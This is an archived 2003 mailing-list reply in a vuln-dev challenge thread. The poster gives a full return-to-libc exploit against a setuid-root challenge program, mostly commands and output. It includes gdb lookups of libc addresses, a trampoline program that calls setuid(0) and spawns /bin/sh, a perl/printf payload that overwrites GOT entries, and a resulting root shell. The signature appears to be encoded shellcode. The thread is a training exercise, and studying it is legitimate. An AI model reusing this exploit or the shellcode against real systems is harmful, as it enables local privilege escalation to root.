Hosting Provided By

Re: [Vuln-dev Challenge] Challenge #2

From: Jose Ronnick <matrix(at)phiral.com>
Date: Sat May 24 2003 - 21:03:03 EDT

On Sat, 24 May 2003 13:11:13 +0200
spacewalker <spacewalker@0xbadc0de.be> wrote:

> 0wn3d. Ret into libc exploitation, no setuid() stuff, quite simple in

I agree about using ret2libc... this one was easy enough you shouldn't have used shellcode.. =) however... you forget that system() executes through /bin/sh which will drop privs. Try making the vuln program suidroot and then run your exploit... still no root shell. =/ close.. but it really doesn't give you much more since you already had a basic user shell before you executed the sploit..

Here's one way to do it using ret2libc to avoid the privilege dropping.. (same as the encrypted post earlier, plaintext now since the cat's outta the bag anyways).. There's also a way to do with without building a trampoline prog to bounce off of.. just chaining libc calls... If no one else posts a solution doing it, I'll do it an post it later...

matrix@overdose vuln-dev $ gcc -o vuln2 vulndev2.c 
matrix@overdose vuln-dev $ sudo chown root.root vuln2
matrix@overdose vuln-dev $ sudo chmod +s vuln2
matrix@overdose vuln-dev $ echo 'main(){sleep();execl();}' > e.c;gcc -o e.x e.c;gdb -q e.x; rm e.*

(gdb) break main
Breakpoint 1 at 0x804836e
(gdb) run
Starting program: /home/matrix/research/vuln-dev/e.x

Breakpoint 1, 0x0804836e in main ()
(gdb) p sleep
$1 = {<text variable, no debug info>} 0x400ce760 <sleep> (gdb) p execl
$2 = {<text variable, no debug info>} 0x400cecc0 <execl> (gdb) quit
The program is running. Exit anyway? (y or n) y matrix@overdose vuln-dev $ objdump -R vuln2 | grep exit 0804974c R_386_JUMP_SLOT exit
matrix@overdose vuln-dev $ echo 'main(){setuid(0);setgid(0);execl("/bin/sh","/bin/sh",0);}' > t.c;gcc -o t.ramp t.c; matrix@overdose vuln-dev $ pwd
/home/matrix/research/vuln-dev
matrix@overdose vuln-dev $ printf "\x60\xe7\x0c\x40/home/matrix/research/vuln-dev/t.ramp\x00" > db.log matrix@overdose vuln-dev $ ./vuln2 `perl -e 'print "\x4c\x97\x04\x08"x31 . "\xc0\xec\x0c\x40" . "\x50\x97\x04\x08"x3;'` h `ç
@/home/matrix/research/vuln-dev/t.ramp root@overdose vuln-dev # id
uid=0(root) gid=0(root) groups=100(users),10(wheel),18(audio),250(portage) root@overdose vuln-dev #

-- 
%JOSE_RONNICK%50,:-dddd-0EEb-pVVyP\-1111-jjjj-yNNN-_4HUP-qq0q-02%r-_Z%JP-%Iwp-5kyyP-n5nn-aTTa-1271P-4ttt-/888-3tSMP-bbnb-L8wL-kMwgP-3Hy3-rqzWP-m%m8-h4x--v%r5P-S7S7-g7g7-F2u2PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP

application/pgp-signature attachment: stored

Received on Sat May 24 23:40:34 2003

Do you need help?

This message: [ Message body ]
Next message: northern snowfall: "Re: N00b questions :\"
Previous message: Janus N.: "Re: [Vuln-dev Challenge] Challenge #2"
In reply to spacewalker: "Re: [Vuln-dev Challenge] Challenge #2"
Next in thread: Jon Erickson: "Re: [Vuln-dev Challenge] Challenge #2 (New technique maybe?)"
Reply: Jon Erickson: "Re: [Vuln-dev Challenge] Challenge #2 (New technique maybe?)"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT